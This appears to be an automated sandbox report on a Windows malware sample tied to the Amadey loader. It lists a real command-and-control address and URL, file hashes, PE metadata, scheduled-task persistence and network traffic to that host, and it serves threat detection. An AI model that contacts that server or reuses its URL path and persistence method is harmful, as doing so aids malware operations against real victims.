                    No contacted domains info
                    NameMaliciousAntivirus DetectionReputation
                    http://185.215.113.16/Jo89Ku7d/index.phptrue
                    • Avira URL Cloud: phishing
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://185.215.113.16/Jo89Ku7d/index.phpmaxplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpomaxplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpiaxplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpSSvaxplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/Jo89Ku7d/index.php&axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpCHIzaxplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpMicRaxplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/Jo89Ku7d/index.php_RE&Raxplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpbaxplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpinbaxplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/Jo89Ku7d/index.phptemaxplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpYaxplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpncoded)axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpOaxplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpNaxplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpb1a30a186ec2d30be6db0b5axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpLaxplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpIVEaxplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpEaxplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpxSuaxplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpD;.Naxplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpPCaxplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpDriaxplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/Jo89Ku7d/index.php?axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpwaxplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpa=Caxplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpndowsaxplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpSyaxplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/Jo89Ku7d/index.php1axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/Jo89Ku7d/index.phprsaxplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    185.215.113.16
                    unknownPortugal
                    206894WHOLESALECONNECTIONSNLtrue
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1520154
                    Start date and time:2024-09-27 05:51:05 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 5m 39s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:8
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:file.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@5/3@0/1
                    EGA Information:
                    • Successful, ratio: 25%
                    HCA Information:Failed
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target axplong.exe, PID 7468 because there are no executed function
                    • Execution Graph export aborted for target axplong.exe, PID 7476 because there are no executed function
                    • Execution Graph export aborted for target file.exe, PID 7276 because it is empty
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • VT rate limit hit for: file.exe
                    TimeTypeDescription
                    04:52:05Task SchedulerRun new task: axplong path: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    23:53:01API Interceptor173944x Sleep call for process: axplong.exe modified
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    185.215.113.16file.exeGet hashmaliciousLummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Socks5SystemzBrowse
                    • 185.215.113.16/Jo89Ku7d/index.php
                    file.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16/Jo89Ku7d/index.php
                    file.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16/Jo89Ku7d/index.php
                    file.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16/Jo89Ku7d/index.php
                    file.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16/Jo89Ku7d/index.php
                    file.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16/Jo89Ku7d/index.php
                    file.exeGet hashmaliciousAmadey, DarkTortillaBrowse
                    • 185.215.113.16/Jo89Ku7d/index.php
                    file.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16/Jo89Ku7d/index.php
                    file.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16/Jo89Ku7d/index.php
                    file.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16/Jo89Ku7d/index.php
                    No context
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousLummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Socks5SystemzBrowse
                    • 185.215.113.103
                    file.exeGet hashmaliciousStealc, VidarBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousStealc, VidarBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16
                    file.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16
                    No context
                    No context
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):1930240
                    Entropy (8bit):7.951101185382818
                    Encrypted:false
                    SSDEEP:24576:2F9unCPFskHeI52FzFYhJFqOZAZKKF0m8qaYJgprK8EaCAJE9v139qPVKZQmzEIv:2FCAGkHezz7nPN81L+lEHOrvYbz4
                    MD5:8367D2F6EF5E11DB59EC8E4295378853
                    SHA1:9653847B6EC9F36137FBE7C68B991E74F54CC7DD
                    SHA-256:08CD0CA2C4916C3F2668E228F72B26A3DE263D37B746DCA48C83202691833752
                    SHA-512:681420D694AD6AA33D4150137892C7199DEE045F3BF1D38174D25C14C38BC99A4518C6E9C860CDC66D3F00D1C8C6B477A379D96E68D6DE8BCA55919B2B309FAC
                    Malicious:true
                    Antivirus:
                    • Antivirus: Avira, Detection: 100%
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....@.f.............................pL...........@...........................L...........@.................................W...k...........................dXL..............................XL..................................................... . ............................@....rsrc...............................@....idata ............................@... .P+.........................@...ibpmkgdy.`....2..Z..................@...kfashbkw.....`L......N..............@....taggant.0...pL.."...R..............@...........................................................................................................................................................................................................................
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:modified
                    Size (bytes):26
                    Entropy (8bit):3.95006375643621
                    Encrypted:false
                    SSDEEP:3:ggPYV:rPYV
                    MD5:187F488E27DB4AF347237FE461A079AD
                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                    Malicious:true
                    Reputation:high, very likely benign file
                    Preview:[ZoneTransfer]....ZoneId=0
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):286
                    Entropy (8bit):3.4424175909307846
                    Encrypted:false
                    SSDEEP:6:KdpbXpRKUEZ+lX1lOJUPelkDdtPjgsW2YRZuy0lb9zt0:KrrpRKQ1lOmeeDHjzvYRQV5zt0
                    MD5:93629468C76715DB38DA85BA8B02E320
                    SHA1:5FA7D03E3C40302BA9CBBFBC2DAEAA9AC9BD94C8
                    SHA-256:2407EAC3A955130C62798784C53019797E601E11C68898B77FDE95F8FF1FD426
                    SHA-512:17DAAC17DC34548354D97E260B82D3BD2CE68A8088D92E3DE8BA1AE4A7D578963F1CF32F4847CA757699C8E4B9A362DA57EF615651C41F55208921F5D2B887B5
                    Malicious:false
                    Reputation:low
                    Preview:.....t.@8+vB.X?_Q.w.F.......<... .....s.......... ....................9.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.4.4.1.1.1.d.b.c.4.9.\.a.x.p.l.o.n.g...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0.................5.@3P.........................
                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):7.951101185382818
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.96%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:file.exe
                    File size:1'930'240 bytes
                    MD5:8367d2f6ef5e11db59ec8e4295378853
                    SHA1:9653847b6ec9f36137fbe7c68b991e74f54cc7dd
                    SHA256:08cd0ca2c4916c3f2668e228f72b26a3de263d37b746dca48c83202691833752
                    SHA512:681420d694ad6aa33d4150137892c7199dee045f3bf1d38174d25c14c38bc99a4518c6e9c860cdc66d3f00d1c8c6b477a379d96e68d6de8bca55919b2b309fac
                    SSDEEP:24576:2F9unCPFskHeI52FzFYhJFqOZAZKKF0m8qaYJgprK8EaCAJE9v139qPVKZQmzEIv:2FCAGkHezz7nPN81L+lEHOrvYbz4
                    TLSH:E19533432551E153CEA27D7307102412F9298B2309BC2E355F4D6AF79817FBD9A2CEAD
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................
                    Icon Hash:90cececece8e8eb0
                    Entrypoint:0x8c7000
                    Entrypoint Section:.taggant
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                    Time Stamp:0x66A240BE [Thu Jul 25 12:10:38 2024 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:6
                    OS Version Minor:0
                    File Version Major:6
                    File Version Minor:0
                    Subsystem Version Major:6
                    Subsystem Version Minor:0
                    Import Hash:2eabe9054cad5152567f0699947a2c5b
                    Instruction
                    jmp 00007F2E04C0F79Ah
                    rsqrtps xmm3, dqword ptr [00000000h]
                    add cl, ch
                    add byte ptr [eax], ah
                    add byte ptr [eax], al
                    add byte ptr [0000000Ah], al
                    add byte ptr [eax], al
                    add byte ptr [eax], dl
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [ecx], al
                    or al, byte ptr [eax]
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [0100000Ah], al
                    or al, byte ptr [eax]
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [ecx+00000080h], dh
                    add byte ptr [eax], al
                    add byte ptr [eax], dh
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax+eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x6a0570x6b.idata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x1e0.rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x4c58640x10ibpmkgdy
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x4c58140x18ibpmkgdy
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    0x10000x680000x2de0040c0c36fc2971a3a04aa1d9a674092fcFalse0.9965940054495913data7.974553430259763IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .rsrc0x690000x1e00x200dfc65756e80fe2267c8f5ee1b1a0ed8aFalse0.580078125data4.558318256855508IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .idata 0x6a0000x10000x200cc76e3822efdc911f469a3e3cc9ce9feFalse0.1484375data1.0428145631430756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    0x6b0000x2b50000x200eb2acc46687cc4209afcc321145fd2dcunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    ibpmkgdy0x3200000x1a60000x1a5a00b1d15f47662eaff2894afb1bc226377cFalse0.9946698738141121data7.9543734899912995IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    kfashbkw0x4c60000x10000x400b14af779ce4f888daf92103fbb1a08c6False0.76171875data6.00029831144431IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .taggant0x4c70000x30000x22005c58e54f153f676c4c9fbacb29100983False0.0661764705882353DOS executable (COM)0.7641369703033931IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    NameRVASizeTypeLanguageCountryZLIB Complexity
                    RT_MANIFEST0x4c58740x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                    DLLImport
                    kernel32.dlllstrcpy
                    Language of compilation systemCountry where language is spokenMap
                    EnglishUnited States
                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                    2024-09-27T05:53:03.600394+02002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.449737185.215.113.1680TCP
                    TimestampSource PortDest PortSource IPDest IP
                    Sep 27, 2024 05:53:02.884510994 CEST4973780192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:02.889308929 CEST8049737185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:02.889442921 CEST4973780192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:02.895417929 CEST4973780192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:02.900603056 CEST8049737185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:03.599792957 CEST8049737185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:03.600394011 CEST4973780192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:03.607597113 CEST4973780192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:03.612399101 CEST8049737185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:03.964904070 CEST8049737185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:03.968730927 CEST4973780192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:04.085433960 CEST4973780192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:04.085828066 CEST4973880192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:04.090616941 CEST8049737185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:04.090634108 CEST8049738185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:04.090719938 CEST4973780192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:04.090780020 CEST4973880192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:04.090979099 CEST4973880192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:04.095761061 CEST8049738185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:04.826024055 CEST8049738185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:04.826086044 CEST4973880192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:04.827244043 CEST4973880192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:04.853068113 CEST8049738185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:05.084682941 CEST8049738185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:05.084830999 CEST4973880192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:05.194510937 CEST4973880192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:05.194894075 CEST4973980192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:05.200073004 CEST8049739185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:05.200177908 CEST4973980192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:05.200288057 CEST8049738185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:05.200356960 CEST4973880192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:05.202043056 CEST4973980192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:05.206762075 CEST8049739185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:09.194917917 CEST4973980192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:09.196608067 CEST4974080192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:09.202860117 CEST8049740185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:09.203039885 CEST4974080192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:09.207912922 CEST4974080192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:09.212676048 CEST8049740185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:09.908310890 CEST8049740185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:09.908417940 CEST4974080192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:10.022764921 CEST4974080192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:10.023092031 CEST4974180192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:10.027882099 CEST8049741185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:10.027911901 CEST8049740185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:10.028122902 CEST4974080192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:10.028127909 CEST4974180192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:10.028362036 CEST4974180192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:10.033802986 CEST8049741185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:10.818706036 CEST8049741185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:10.818876982 CEST4974180192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:10.819758892 CEST4974180192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:10.824554920 CEST8049741185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:11.041826963 CEST8049741185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:11.041883945 CEST4974180192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:11.147711992 CEST4974180192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:11.148135900 CEST4974280192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:11.152817011 CEST8049741185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:11.152889013 CEST4974180192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:11.152889967 CEST8049742185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:11.152961016 CEST4974280192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:11.153100014 CEST4974280192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:11.157830000 CEST8049742185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:11.850214958 CEST8049742185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:11.850311041 CEST4974280192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:11.851105928 CEST4974280192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:11.861911058 CEST8049742185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:12.079926968 CEST8049742185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:12.080095053 CEST4974280192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:12.230173111 CEST4974280192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:12.230541945 CEST4974380192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:12.240308046 CEST8049743185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:12.240446091 CEST4974380192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:12.240636110 CEST4974380192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:12.240816116 CEST8049742185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:12.240971088 CEST4974280192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:12.253932953 CEST8049743185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:12.988409996 CEST8049743185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:12.988504887 CEST4974380192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:12.993175030 CEST4974380192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:13.000787020 CEST8049743185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:13.231659889 CEST8049743185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:13.231781006 CEST4974380192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:13.335316896 CEST4974380192.168.2.4185.215.113.16
